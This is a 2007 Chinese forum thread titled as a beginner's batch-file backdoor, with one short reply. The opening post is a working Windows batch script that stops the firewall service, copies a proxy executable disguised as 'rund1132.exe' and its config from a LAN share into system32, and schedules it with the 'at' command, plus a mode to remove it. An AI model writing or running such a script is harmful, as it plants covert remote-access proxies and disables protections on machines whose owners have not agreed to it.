中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
作者:
标题: 新手学写批处理后门 上一主题 | 下一主题
world615
初级用户





积分 24
发帖 9
注册 2007-8-1
状态 离线
『楼 主』:  新手学写批处理后门

@echo off
set p=\\192.168.0.%1\share\....\*.*
set p2=%systemroot%\system32\
set cm1=net stop sharedaccess
set cm2=taskkill /im "rund1132.exe" /F
set cm3=ping 127.0.0.1 -n 3
set cho=%2
if "%cho%"=="/i" goto i
if "%cho%"=="/d" goto d

:i
net start | find /I "ICS" >nul && %cm1% >nul
tasklist | find /I "rund1132.exe" >nul && %cm2% >nul && %cm3% >nul
copy %p% %p2% /y >nul && goto get_time
exit

:d
tasklist | find /I "rund1132.exe" >nul && %cm2% >nul && %cm3% >nul
del %p2%rund1132.exe
del %p2%CCProxy.ini
del %p2%AccInfo.ini
del %p2%CDial.dll
exit

:get_time
set h=%time:~0,2% & set m=%time:~3,2%
  if "%h:~0,1%"=="0" set h=%h:~1,1%
  if "%m:~0,1%"=="0" set m=%m:~1,1%
set /a m+=1
  if "%m:~0,2%"=="60" (set /a h+=1 & set m=00)
  if "%h:~0,2%"=="24" set t=00
set st=%h%:%m%
set st=%st: =%
at %st% cmd /c "rund1132.exe" >nul
exit

2007-10-18 10:24
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
Lick
初级用户





积分 62
发帖 28
注册 2006-3-14
状态 离线
『第 2 楼』:  

呵呵,太高了,还看不明白``

2007-10-19 01:16
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复

请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转: